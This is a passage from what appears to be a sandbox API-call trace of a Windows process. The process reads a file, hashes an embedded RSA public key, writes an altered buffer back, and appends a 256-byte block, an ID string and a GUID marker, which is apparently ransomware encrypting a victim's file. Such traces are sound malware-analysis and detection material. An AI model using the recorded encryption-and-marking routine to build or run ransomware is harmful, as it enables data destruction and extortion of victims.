hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=47235) returned 1 [0196.343] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0196.346] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0xb85d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.346] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0196.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0196.348] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.348] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.348] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xb883, lpOverlapped=0x0) returned 1 [0196.349] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.349] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0196.350] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.350] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.350] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0196.351] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0196.351] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.351] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0196.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0196.351] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0196.351] GetLastError () returned 0x0 [0196.351] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0196.351] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0196.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0196.352] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0196.352] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0196.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0196.352] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0196.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0196.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb880) returned 0x2d4b778 [0196.353] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.354] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0196.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0196.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0196.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0196.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0196.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2ce00 [0196.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a228 [0196.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2ce48 [0196.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a240 [0196.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a270 [0196.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2d0 [0196.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a288 [0196.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0196.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0196.355] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0196.355] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0196.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a270 | out: hHeap=0x6a0000) returned 1 [0196.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a288 | out: hHeap=0x6a0000) returned 1 [0196.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2d0 | out: hHeap=0x6a0000) returned 1 [0196.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0196.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2d0 [0196.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37800 [0196.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a288 [0196.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0196.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a270 [0196.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0196.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2be2220 [0196.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0196.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0196.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0196.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0196.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c443e8 [0196.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0196.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0196.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a288 | out: hHeap=0x6a0000) returned 1 [0196.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0196.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a270 | out: hHeap=0x6a0000) returned 1 [0196.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0196.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0196.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2d0 | out: hHeap=0x6a0000) returned 1 [0196.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0196.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0196.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0196.358] GetCurrentThreadId () returned 0x264 [0196.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0196.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d47290 [0196.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0196.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0196.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0196.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0196.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0196.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0196.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.358] GetCurrentThreadId () returned 0x264 [0196.358] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2c03ca0 [0196.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0196.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0196.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0196.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0196.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0196.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0ec50 [0196.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0196.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2d0 [0196.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0196.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0196.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0196.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0196.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0196.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0196.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0196.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0196.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a270 [0196.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0196.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0196.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0196.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0196.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0196.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0196.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0196.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a288 [0196.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0196.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0196.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0196.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a258 [0196.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0196.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a2e8 [0196.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0196.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0196.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0196.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2b8 [0196.362] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0196.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2a0 [0196.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0196.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a300 [0196.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2a0 | out: hHeap=0x6a0000) returned 1 [0196.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a2a0 [0196.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2b8 | out: hHeap=0x6a0000) returned 1 [0196.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0196.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0196.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0196.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0196.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0196.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a270 | out: hHeap=0x6a0000) returned 1 [0196.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a270 [0196.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0196.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0196.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2d0 | out: hHeap=0x6a0000) returned 1 [0196.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0196.363] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a300 | out: hHeap=0x6a0000) returned 1 [0196.364] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0196.364] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0196.364] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0d0a0 [0196.364] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0196.364] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0196.364] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a270 | out: hHeap=0x6a0000) returned 1 [0196.364] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0196.364] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0196.365] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0196.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0196.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0196.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0196.365] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0196.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0196.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0196.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0196.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0196.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0d0a0 | out: hHeap=0x6a0000) returned 1 [0196.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0196.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2a0 | out: hHeap=0x6a0000) returned 1 [0196.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0196.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2e8 | out: hHeap=0x6a0000) returned 1 [0196.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0196.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a288 | out: hHeap=0x6a0000) returned 1 [0196.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a258 | out: hHeap=0x6a0000) returned 1 [0196.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0196.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0196.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0196.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a240 | out: hHeap=0x6a0000) returned 1 [0196.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ce48 | out: hHeap=0x6a0000) returned 1 [0196.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0196.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0196.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0196.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0196.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0196.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0196.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0196.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0196.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0196.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0196.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0196.371] WriteFile (in: hFile=0x52c, lpBuffer=0x2d4b778*, nNumberOfBytesToWrite=0xb87e, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d4b778*, lpNumberOfBytesWritten=0x30ffb14*=0xb87e, lpOverlapped=0x0) returned 1 [0196.372] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4b778 | out: hHeap=0x6a0000) returned 1 [0196.372] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0xb883, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.372] WriteFile (in: hFile=0x52c, lpBuffer=0x2be2220*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2be2220*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0196.373] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0196.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0196.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0196.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0196.373] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0196.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0196.374] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0196.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.374] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.374] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0196.374] CloseHandle (hObject=0x52c) returned 1 [0196.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47958 [0196.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8a0) returned 0x2d3a670 [0196.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: 